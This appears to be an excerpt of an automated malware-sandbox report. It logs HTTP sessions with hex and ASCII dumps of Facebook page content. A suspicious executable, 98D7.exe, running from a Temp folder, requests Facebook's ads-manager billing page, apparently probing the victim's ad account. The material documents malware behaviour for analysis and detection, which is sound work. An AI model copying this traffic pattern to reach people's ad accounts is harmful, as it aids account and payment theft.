5a 41 61 61 6d 30 38 79 65 57 4d 6c 56 6d 45 4f 5f 52 5f 57 55 65 37 65 66 42 6a 77 65 41 49 31 6b
                                                                                    Data Ascii: liance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT2QKLyU39rhJKhcWxLk8cx7C4ykl2Y9KyGcrQdPoMp714p7dOJmpJ7LwojUZAaam08yeWMlVmEO_R_WUe7efBjweAI1k
                                                                                    2023-02-07 18:46:02 UTC997INData Raw: 37 70 41 65 2d 37 6f 4d 56 71 44 57 63 63 58 61 51 46 53 2d 79 69 36 63 34 4a 33 7a 63 71 44 71 79 72 76 66 32 4f 30 6a 32 6d 63 7a 42 77 64 4a 51 63 39 72 36 32 5a 6e 54 76 47 64 76 4f 76 37 53 4c 7a 52 42 33 4f 36 5a 32 37 4a 72 76 4a 54 33 4e 4a 6c 42 61 36 5a 6d 35 7a 44 65 45 33 49 4d 65 6f 46 6b 37 4a 49 6c 4a 5f 6f 57 74 2d 4f 38 75 4c 5f 39 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75
                                                                                    Data Ascii: 7pAe-7oMVqDWccXaQFS-yi6c4J3zcqDqyrvf2O0j2mczBwdJQc9r62ZnTvGdvOv7SLzRB3O6Z27JrvJT3NJlBa6Zm5zDeE3IMeoFk7JIlJ_oWt-O8uL_9A\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u003C\/a>\u003C\/li>\u003Cli>\u
                                                                                    2023-02-07 18:46:02 UTC998INData Raw: 63 6f 6e 74 72 6f 6c 73 20 6f 66 66 65 72 65 64 20 62 79 20 70 6f 70 75 6c 61 72 20 62 72 6f 77 73 65 72 73 20 61 74 20 74 68 65 20 6c 69 6e 6b 73 20 62 65 6c 6f 77 2e 20 43 65 72 74 61 69 6e 20 70 61 72 74 73 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 20 6d 61 79 20 6e 6f 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 69 66 20 79 6f 75 20 68 61 76 65 20 64 69 73 61 62 6c 65 64 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 2e 20 50 6c 65 61 73 65 20 62 65 20 61 77 61 72 65 20 74 68 61 74 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 64 69 73 74 69 6e 63 74 20 66 72 6f 6d 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 74 68 61 74 20 46 61 63 65 62 6f 6f 6b 20 6f 66 66 65 72 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20
                                                                                    Data Ascii: controls offered by popular browsers at the links below. Certain parts of Meta Products may not work properly if you have disabled browser cookies. Please be aware that these controls are distinct from the controls that Facebook offers.\u003C\/p>\u003Cul
                                                                                    2023-02-07 18:46:02 UTC1000INData Raw: 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 46 69 72 65 66 6f 78 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 67 75 69 64 65 5c 75 30 30 32 35 32 46 73 61 66 61 72 69 5c 75 30 30 32 35 32 46 73 66 72 69 31 31 34 37 31 5c 75 30 30 32 35 32 46 6d 61 63 26 61 6d 70 3b 68 3d 41 54 31
                                                                                    Data Ascii: el=\"nofollow\" data-lynx-mode=\"asynclazy\">Firefox\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-ie\u00252Fguide\u00252Fsafari\u00252Fsfri11471\u00252Fmac&amp;h=AT1
                                                                                    2023-02-07 18:46:02 UTC1001INData Raw: 34 6a 79 33 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 5c 22 20 64 61 74 61 2d 63 6f 6f 6b 69 65 62 61 6e 6e 65 72 3d 5c 22 61 63 63 65 70 74 5f 6f 6e 6c 79 5f 65 73 73 65 6e 74 69 61 6c 5f 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 39 31 5c 22 3e 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30
                                                                                    Data Ascii: 4jy3 _4jy1 selected _51sy\" data-cookiebanner=\"accept_only_essential_button\" data-testid=\"cookie-policy-manage-dialog-accept-button\" title=\"Only allow essential cookies\" type=\"submit\" id=\"u_0_c_91\">Only allow essential cookies\u003C\/button>\u00
                                                                                    2023-02-07 18:46:02 UTC1003INData Raw: 5f 30 5f 66 5f 4e 6c 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 52 6f 6d 5c 75 30 30 65 32 6e 5c 75 30 31 30 33 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 70 35 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 75 6f 6d 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 48 33 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 76 65 6e 73 6b 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 6f 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 45 73 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 5c 75 30 30 66 63
                                                                                    Data Ascii: _0_f_Nl",{"__html":"Rom\u00e2n\u0103"},1],["__markup_3310c079_0_g_p5",{"__html":"Suomi"},1],["__markup_3310c079_0_h_H3",{"__html":"Svenska"},1],["__markup_3310c079_0_i_oO",{"__html":"Ti\u1ebfng Vi\u1ec7t"},1],["__markup_3310c079_0_j_Es",{"__html":"T\u00fc
                                                                                    2023-02-07 18:46:02 UTC1004INData Raw: 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 30 74 22 2c 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 5a 4d 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 44 52 22 2c 22 75 5f 30 5f 36 5f 6f 43 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6f 64 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 30 6a 22 2c 22 75 5f 30 5f 37 5f 34 36 22 2c 33 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6f 64 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 4c 7a 22 2c 22 75 5f 30 5f 38 5f 4a 53 22 2c 31 2c 22 5f
                                                                                    Data Ascii: em_a588f507_0_0_0t","globalContainer",2],["__elem_a588f507_0_2_ZM","content",1],["__elem_1de146dc_0_0_DR","u_0_6_oC",1,"__markup_9f5fac15_0_0_od"],["__elem_ec77afbd_0_0_0j","u_0_7_46",3,"__markup_9f5fac15_0_0_od"],["__elem_a588f507_0_3_Lz","u_0_8_JS",1,"_
                                                                                    2023-02-07 18:46:02 UTC1005INData Raw: 31 35 5f 30 5f 30 5f 46 35 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 35 47 22 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 55 73 65 53 69 6e 67 6c 65 4c 65 76 65 6c 4d 61 6e 61 67 65 44 69 61 6c 6f 67 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 35 47 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 64 39 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 54 69 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 35 47 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64
                                                                                    Data Ascii: 15_0_0_F5"},"en_US",true,"Facebook"]],["__inst_ead1e565_0_0_5G"],["WebCookieUseSingleLevelManageDialogController","init",["__inst_ead1e565_0_0_5G","__elem_45d73b5d_0_0_d9","__elem_45d73b5d_0_1_Ti"],[{"__m":"__inst_ead1e565_0_0_5G"},{"__m":"__elem_45d73b5d
                                                                                    2023-02-07 18:46:02 UTC1007INData Raw: 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 2b 54 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 2b 54 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 77 66 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 77 66 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e
                                                                                    Data Ascii: lem_a588f507_0_5_+T"],[{"__m":"__elem_a588f507_0_5_+T"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_6_wf"],[{"__m":"__elem_a588f507_0_6_wf"},"_9ngb","._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReferen
                                                                                    2023-02-07 18:46:02 UTC1008INData Raw: 58 7a 6e 59 37 71 31 6f 6c 49 33 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 30 2f 6c 2f 30 2c 63 72 6f 73 73 2f 66 31 46 53 38 69 4a 53 5f 56 78 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73
                                                                                    Data Ascii: XznY7q1olI3.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/f1FS8iJS_Vx.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross
                                                                                    2023-02-07 18:46:02 UTC1010INData Raw: 70 65 3d 6e 65 77 20 42 69 67 50 69 70 65 28 7b 22 66 6f 72 63 65 46 69 6e 69 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 6c 75 73 68 5f 70 61 67 65 6c 65 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 51 41 39 63 46 46 42 55 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69
                                                                                    Data Ascii: pe=new BigPipe({"forceFinish":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><script nonce="QA9cFFBU">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArri
                                                                                    2023-02-07 18:46:02 UTC1011INData Raw: 36 33 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 68 65 5f 65 6e 64 3a 74 72 75 65 2c 6a 73 6d 6f 64 73 3a 7b 64 65 66 69 6e 65 3a 5b 5b 22 54 69 6d 65 53 6c 69 63 65 49 6e 74 65 72 61 63 74 69 6f 6e 53 56 22 2c 5b 5d 2c 7b 6f 6e 5f 64 65 6d 61 6e 64 5f 72 65 66 65 72 65 6e 63 65 5f 63 6f 75 6e 74 69 6e 67 3a 74 72 75 65 2c 6f 6e 5f 64 65 6d 61 6e 64 5f 70 72 6f 66 69 6c 69 6e 67 5f 63 6f 75 6e 74 65 72 73 3a 74 72 75 65 2c 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 30 2c 6c 69 74 65 5f 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 6c 69 74 65 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 30 2c 61 64 73 5f 70 65 72
                                                                                    Data Ascii: 63,last_in_phase:true,the_end:true,jsmods:{define:[["TimeSliceInteractionSV",[],{on_demand_reference_counting:true,on_demand_profiling_counters:true,default_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_per
                                                                                    2023-02-07 18:46:02 UTC1013INData Raw: 38 33 76 47 4e 44 66 6f 75 55 61 39 58 31 71 49 5f 4b 74 47 31 58 7a 39 38 30 64 32 6c 68 76 32 59 4a 4c 78 5f 69 6c 61 39 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 31 37 34 33 39 22 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 54 79 5f 75 6a 4e 73 39 34 35 76 30 56 31 4a 56 69 56 55 76 6f 46 72 41 55 58 6b 52 4f 45 43 77 31 62 36 72 54 76 56 47 6f 4f 74 45 73 7a 38 33 76 47 4e 44 66 6f 75 55 61 39 58 31 71 49 5f 4b 74 47 31 58 7a 39 38 30 64 32 6c 68 76 32 59 4a 4c 78 5f 69 6c 61 39 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 34 38 36 35 22 2c 5b 22 52 65 61 63 74 44 4f 4d 4c 65 67 61 63 79 5f 44 45 50 52 45 43 41 54 45 44 22
                                                                                    Data Ascii: 83vGNDfouUa9X1qI_KtG1Xz980d2lhv2YJLx_ila9I"]},-1],["cr:917439",["PageTransitionsBlue"],{__rc:["PageTransitionsBlue","Aa2Ty_ujNs945v0V1JViVUvoFrAUXkROECw1b6rTvVGoOtEsz83vGNDfouUa9X1qI_KtG1Xz980d2lhv2YJLx_ila9I"]},-1],["cr:4865",["ReactDOMLegacy_DEPRECATED"
                                                                                    2023-02-07 18:46:02 UTC1014INData Raw: 6f 77 6e 5f 72 6f 75 74 65 73 3a 5b 22 61 72 74 69 6c 6c 65 72 79 5f 6a 61 76 61 73 63 72 69 70 74 5f 61 63 74 69 6f 6e 73 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6a 61 76 61 73 63 72 69 70 74 5f 74 72 61 63 65 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6c 6f 67 67 65 72 5f 64 61 74 61 22 2c 22 6c 6f 67 67 65 72 22 2c 22 66 61 6c 63 6f 22 2c 22 67 6b 32 5f 65 78 70 6f 73 75 72 65 22 2c 22 6a 73 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 22 2c 22 6c 6f 6f 6d 5f 74 72 61 63 65 22 2c 22 6d 61 72 61 75 64 65 72 22 2c 22 70 65 72 66 78 5f 63 75 73 74 6f 6d 5f 6c 6f 67 67 65 72 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 71 65 78 22 2c 22 72 65 71 75 69 72 65 5f 63 6f 6e 64 5f 65 78 70 6f 73 75 72 65 5f 6c 6f 67 67 69 6e 67 22 5d 2c 73 68 6f 75 6c 64 5f 64 72 6f 70 5f 75 6e
                                                                                    Data Ascii: own_routes:["artillery_javascript_actions","artillery_javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging"],should_drop_un
                                                                                    2023-02-07 18:46:02 UTC1016INData Raw: 51 38 4f 39 70 6f 55 35 62 67 48 54 79 73 75 50 6a 38 4a 61 48 6d 61 69 74 75 65 6c 41 6f 65 5a 72 4f 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 33 33 35 39 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 2c 22 41 61 33 6f 77 46 53 52 78 39 50 39 44 70 6a 4c 47 37 4f 32 45 65 76 35 46 67 57 4d 5f 44 30 59 56 4e 4a 48 77 67 4d 6d 51 78 75 46 6c 53 57 4b 62 78 6c 46 57 61 39 67 4f 4c 56 61 42 66 44 6a 52 68 42 6b 6e 68 69 77 6d 47 30 46 73 30 4e 77 35 77 42 4e 4e 4a 35 44 41 52 42 69 46 77 53 71 63 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e
                                                                                    Data Ascii: Q8O9poU5bgHTysuPj8JaHmaituelAoeZrOQ"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerImplForBlue","Aa3owFSRx9P9DpjLG7O2Eev5FgWM_D0YVNJHwgMmQxuFlSWKbxlFWa9gOLVaBfDjRhBknhiwmG0Fs0Nw5wBNNJ5DARBiFwSqcA"]},-1],["TrackingConfig",[],{domain
                                                                                    2023-02-07 18:46:02 UTC1017INData Raw: 2c 5b 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 61 63 68 65 22 2c 22 72 75 6e 22 2c 5b 5d 2c 5b 30 2c 22 63 5f 75 73 65 72 22 5d 5d 2c 5b 22 4e 61 76 69 67 61 74 69 6f 6e 43 6c 69 63 6b 50 6f 69 6e 74 48 61 6e 64 6c 65 72 22 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 4c 6f 67 67 69 6e 67 22 2c 22 64 6f 4c 6f 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c
                                                                                    Data Ascii: ,[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    11192.168.2.349727157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:04 UTC1018OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:04 UTC1019INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: fh7QDHEKnZsMAVfNH85ukNgW/C6t1F0wDzupAoTohkiz2nm5RvKgZ+C2CmR/zHTNwMOK8OTHVbXGi1pmpXPXLg==
                                                                                    2023-02-07 18:46:04 UTC1021INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 30 34 20 47 4d 54 0d 0a 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:04 GMTPriority: u=3,iAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    12192.168.2.349730157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:04 UTC1021OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
